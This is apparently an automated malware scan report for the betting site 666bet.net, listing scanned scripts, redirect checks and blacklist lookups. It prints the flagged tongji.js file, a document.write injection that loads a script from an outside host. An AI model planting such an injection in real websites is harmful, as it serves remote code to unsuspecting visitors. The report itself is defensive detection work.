Scanned pages/files
Request | Server response | Status |
http://666bet.net/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 09 Jul 2014 18:35:27 GMT Location: http://www.666bet.net/ Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://www.666bet.net/ | 200 OK Content-Length: 20223 Content-Type: text/html | clean |
http://www.666bet.net/include/dedeajax2.js | 200 OK Content-Length: 6902 Content-Type: application/x-javascript | clean |
http://666bet.net/images/js/j.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 09 Jul 2014 18:35:30 GMT Location: http://www.666bet.net/images/js/j.js Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://www.666bet.net/images/js/j.js | 200 OK Content-Length: 31018 Content-Type: application/x-javascript | clean |
http://666bet.net/templets/default/js/pic_scroll.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 09 Jul 2014 18:35:32 GMT Location: http://www.666bet.net/templets/default/js/pic_scroll.js Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://www.666bet.net/templets/default/js/pic_scroll.js | 200 OK Content-Length: 3762 Content-Type: application/x-javascript | clean |
http://666bet.net/templets/default/js/jquery.cookie.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 09 Jul 2014 18:35:33 GMT Location: http://www.666bet.net/templets/default/js/jquery.cookie.js Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://www.666bet.net/templets/default/js/jquery.cookie.js | 200 OK Content-Length: 4246 Content-Type: application/x-javascript | clean |
http://666bet.net/templets/default/js/changeSkin.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 09 Jul 2014 18:35:34 GMT Location: http://www.666bet.net/templets/default/js/changeSkin.js Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://www.666bet.net/templets/default/js/changeskin.js | 200 OK Content-Length: 1555 Content-Type: text/html | clean |
http://www.666bet.net/list-37.html | 200 OK Content-Length: 16044 Content-Type: text/html | clean |
http://www.666bet.net/templets/default/js/changeSkin.js | 200 OK Content-Length: 693 Content-Type: application/x-javascript | clean |
http://www.kbw888.com/m/pic_700x60.js | 200 OK Content-Length: 534 Content-Type: application/x-javascript | clean |
http://www.kbw888.com/m/pic_960x60.js | 200 OK Content-Length: 510 Content-Type: application/x-javascript | clean |
http://www.kbw888.com/m/pic_960x60_2.js | 200 OK Content-Length: 5177 Content-Type: application/x-javascript | clean |
http://www.kbw888.com/m/pic_960x60_3.js | 200 OK Content-Length: 516 Content-Type: application/x-javascript | clean |
http://js.users.51.la/4394681.js | 200 OK Content-Length: 1977 Content-Type: application/x-javascript | clean |
http://www.666bet.net/tongji.js | 200 OK Content-Length: 377 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<script src="http://mc.127.cc/domain4.js" language="JavaScript" type="text\/javascript"><\/sc'+'ript>');
document.write('<script src="http://js.users.51.la/15988435.js" language="JavaScript" type="text\/javascript"><\/sc'+'ript>'); document.write('<script src="http://js.users.51.la/4394681.js" language="JavaScript" type="text\/javascript"><\/sc'+'ript>'); Antivirus reports:
| ||
http://www.bocainetom/m/pic_fly.js | 500 Can't connect to www.bocainetom:80 (Bad hostname) Content-Length: 160 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 666bet.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 09 Jul 2014 18:35:27 GMT
Location: http://www.666bet.net/
Server: nginx
Content-Length: 178
Content-Type: text/html
...178 bytes of data.
GET / HTTP/1.1
Host: 666bet.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 09 Jul 2014 18:35:27 GMT
Location: http://www.666bet.net/
Server: nginx
Content-Length: 178
Content-Type: text/html
...178 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 666bet.net
Referer: http://www.google.com/search?q=666bet.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 666bet.net
Referer: http://www.google.com/search?q=666bet.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=666bet.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://666bet.net/
Result: 666bet.net is not infected or malware details are not published yet.
Result: 666bet.net is not infected or malware details are not published yet.